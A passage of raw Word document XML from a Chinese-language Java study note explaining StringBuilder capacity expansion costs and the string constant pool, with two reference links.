          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="009E69F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，最好预先估计好字符串的大小避免扩容带来的时间消耗。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F77CCF" w:rsidRDefault="00F77CCF" w:rsidP="00F77CCF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009765B7" w:rsidRDefault="009765B7" w:rsidP="00F77CCF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:firstLine="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>采用不初始化初始容器的方式进行，这也是大部分程序员能做到的。这里会产生多少对象呢？在外面看来是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>个对象，其实不是这样的。这里又要看一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的初始容量是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>i=13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的时候出现了一次扩容，看一下内部的会用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>System.arrayCopy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来实现一个扩容机制。这里再回到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内部的存储是采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数组实现存储的，而这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>char[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的初始容量就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这样当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>i=13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的时候会发现原来的数组已经装不下了，这时候怎么办？这时</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>候首先申请一个更大容量的数组，新申请数组的大小是多少呢？是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>当前容量的大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>+1)*2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，也就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84574">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>很多人说我这时候加入的字符串还是大于扩充的容量怎么办，这里做一个处理，就是如果发现加进来的字符串的大小大于当前新申请的容量，就以新加进来的字符串的大小作为申请容易的大小。这里说的有点绕，看代码会清晰很多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006447A4" w:rsidRDefault="009765B7" w:rsidP="00A72858">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:firstLine="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>回到我所说的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>test4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>例子，根据上面的分析，其实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>需要做几次扩容才能完成，这里性能损失会在哪，一个是数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，另外一个就是扩容产生的垃圾对象需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>回收都会造成性能损耗。算一下这里要扩容几次。要扩容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>次，中间就会产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>个中间对象需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>回收，而越往后面垃圾对象越大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A72858" w:rsidRPr="009765B7" w:rsidRDefault="00A72858" w:rsidP="00A72858">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:firstLine="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A72858">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>http://www.jb51.net/article/78057.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009765B7" w:rsidRPr="00F405BD" w:rsidRDefault="009765B7" w:rsidP="00F405BD">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F66C0" w:rsidRPr="00C86279" w:rsidRDefault="008F66C0" w:rsidP="008F66C0">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.2.3 StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩容性能损失</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E467B6" w:rsidRDefault="00D47463" w:rsidP="00E467B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:firstLine="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内部的会用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>System.arrayCopy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来实现一个扩容机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一个是</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6" w:rsidRPr="00696E28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6" w:rsidRPr="00696E28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，另外一个就是扩容产生的垃圾对象需要</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6" w:rsidRPr="00696E28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6" w:rsidRPr="00696E28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>回收都会造成性能损耗</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。算一下这里要扩容几次。要扩容</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>次，中间就会产生</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>个中间对象需要</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="00E467B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>回收，而越往后面垃圾对象越大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A54AFF" w:rsidRPr="00E467B6" w:rsidRDefault="00A54AFF" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00592B37" w:rsidRDefault="00592B37" w:rsidP="00592B37">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00996AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在高性能场景下应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821406" w:rsidRPr="00821406" w:rsidRDefault="00821406" w:rsidP="00821406">
      <w:r w:rsidRPr="00821406">
        <w:t>http://calvin1978.blogcn.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2E65" w:rsidRPr="00C86279" w:rsidRDefault="002B2E65" w:rsidP="002B2E65">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00AE25B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串常量池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A54AFF" w:rsidRDefault="00BD36F0" w:rsidP="0024633D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD36F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串常量池中存放的时引用还是对象，这个问题是最常见的。字符串常量池存放的是对象引用，不是对象。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD36F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD36F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，对象都创建在堆内存中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C7D4E" w:rsidRPr="005C7D4E" w:rsidRDefault="005C7D4E" w:rsidP="005C7D4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>字符串常量池的好处就是减少相同内容字符串的创建，节省内存空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C7D4E" w:rsidRDefault="005C7D4E" w:rsidP="005C7D4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>如果硬要说弊端的话，就是牺牲了</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>计算时间来换空间。</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
